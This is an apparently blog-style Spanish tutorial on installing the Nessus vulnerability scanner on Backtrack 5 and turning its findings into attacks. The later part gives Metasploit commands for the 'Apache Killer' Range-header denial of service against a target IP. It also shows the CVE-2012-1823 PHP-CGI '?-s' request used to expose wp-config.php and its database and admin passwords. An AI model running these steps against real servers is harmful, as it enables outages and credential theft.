Bueno comenzaremos definiendo que es Nessus: Nessus es un programa que escanea vulnerabilidades de diversos Sistemas Operativos (Windows - Linux - Mac - Solaris, etc...), ademas de encontrar errores de configuraciones y vulnerabilidades, ya sean por falta de actualización del S.O, puertos que pueden llevar a sesiones meterpreter, procesos Web o fallos en softwares instalados (Apache, Mysql, etc)
Ya saliendo un poco de lo teorico, vamos a lo practico, Nessus podemos encontrarlo tanto para Windows como Linux, yo en mi caso lo mostrare en Backtrack 5.
La descarga tanto como para Linux, Windows, Mac y otros en el siguiente
Ubuntu 11.10 / Ubuntu 12.04 (32 bits):Nessus-5.0.3-ubuntu1110_i386.deb
Bueno, ademas de la descarga les vendrá con un Formato .deb y para no complicarse con la instalación, vamos a la Consola de Backtrack y pegamos esto: sudo apt-get install gdebi, esperamos a que se instale y podremos instalar fácilmente en fichero descargado como en la siguiente imagen:
Esperamos a que instale y empezaremos a instarlo, crear el usuario etc.
Bueno luego de instarlo iremos a la consola nuevamente y pondremos lo siguiente: /opt/nessus/sbin/nessus-adduser
Como se ve en la imagen, pondremos un usuario y la pass, nos haceuna pregunta para cargar plugins y aceptar reglas etc, le damos en "y"=yes
le damos en la opcion de usar nessus en su hogar. Al lado derecho pondremos nuestros datos y iremos a nuestro correo en el cual obtendremos el codigo para activar nuestro producto.
Ya con el codigo en nuestro poder nuevamente iremos a la consola y pondremos lo siguiente: sudo /opt/nessus/bin/nessus-fetch --register XXXX-XXXX (XXXX-XXXX= codigo obtenido)
Luego para iniciar Nessus pondremos esto en consola: /etc/init.d/nessusd start, Luego de esto vamos a nuestro Navegador pondremos esta direccion : https://localhost:8834 y tendremos nuestro Nessus listo para realizar nuestras pruebas.
Ya en esta web nos vamos a logear con el usuario que creamos anteriormente, una vez dentro podremos crear un scan a alguna ip que sea nuestro objetivo a escanear, para no dejar todo inconcluso les dare un ejemplo de scaneo y como buscar la vulnerabilidad y explotarla.
Para crear un nuevo Analisis, vamos a la pestaña Scan y New Scan:
Pasados algunos minutos obtendremos los resultados y el Scan estara terminado por completo, asi como en la siguiente imagen:
Como se ve tenemos Vulnerabilidades ordenadas de acuerdo a su prioridad desde Criticas, Altas, Medias, Bajas etc. En nuestro ejemplo tomaremos las mas criticasDaremos con la siguiente:Apache 2.2 <2.2.13 apr_palloc abril de desbordamiento del montónInformación sobre la vulnerabilidadCPE:
cpe :/ A: apache: http_serverExploit Disponible: noFacilidad de explotabilidad:
No hay ataques conocidos están disponiblesPatch Fecha de publicación:
08/09/2009Fecha de la vulnerabilidad de publicación:
08/04/2009
La información nos dice que no cuenta con exploits disponibles, pero no solo podemo quedarnos con esto, entonces nos asistiremos de nuestro amigo GOOGLE y buscaremos la informacion empezando por ingresar el CPE: cpe :/ A: apache: http_server.
Y listo en primer lugar obtendremos la siguiente Web: http://www.security-database.com/cpe.php?detail=cpe:/a:apache:http_server:1.3.41, la cual nos indica al final que si existe un Exploit disponible llamado Apache Range header DoS (Apache Killer):
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/http/apache_range_dos
msf auxiliary(apache_range_dos) > set RHOST [TARGET IP]
msf auxiliary(apache_range_dos) > runEso ya es una vulnerabilidad encontrada, el denominado Apache Killer, y con la ayuda de nuestro amigo METASPLOIT.
Otro Ejemplo: PHP <5.3.12 / 5.4.2 Ejecución de la consulta CGI Código cuerdas
Información sobre la vulnerabilidadCPE:
cpe :/ A: php: phpExploit Disponible:
verdaderoFacilidad de explotabilidad:
Los exploits están disponiblesPatch Fecha de publicación:
05/03/2012Fecha de la vulnerabilidad de publicación:
05/03/2012Explotable con:
- Metasploit (PHP inyección argumento CGI)
- CANVAS (lienzo)
- Core Impact
Información de referenciacve:CVE-2012-1823OSVDB:81633oferta:53388cert:520827
Bueno entonces comenzaremos a buscar, empezaremos por el CVE-2012-1823, buscando un poco nos encontramos con la siguiente web: http://systemadmin.es/2012/05/bug-de-php-cve-2012-1823, la cual nos indica un bug php la cual nos permite ver los codigos de fuente de archivos comprometedores ya sea wp-config en Wordpress, config.php, conexion.php etc. Para poder testear la vulnerabilidad si es que la encontramos en algun testeo de seguridad y claro nos da Nessus como resulta que la web si cuenta con la vulne, la pondriamos asi:
Sitioweb.com/wp-config.php?-s (el cual nos mostraria el codigo de fuente, dejando a nuestros ojos toda la configuracion, user y password mysql, user y pass del panel de administracion y otras cosas interesantes, sin mas que decir, usen esta herramienta para su beneficio.
fuente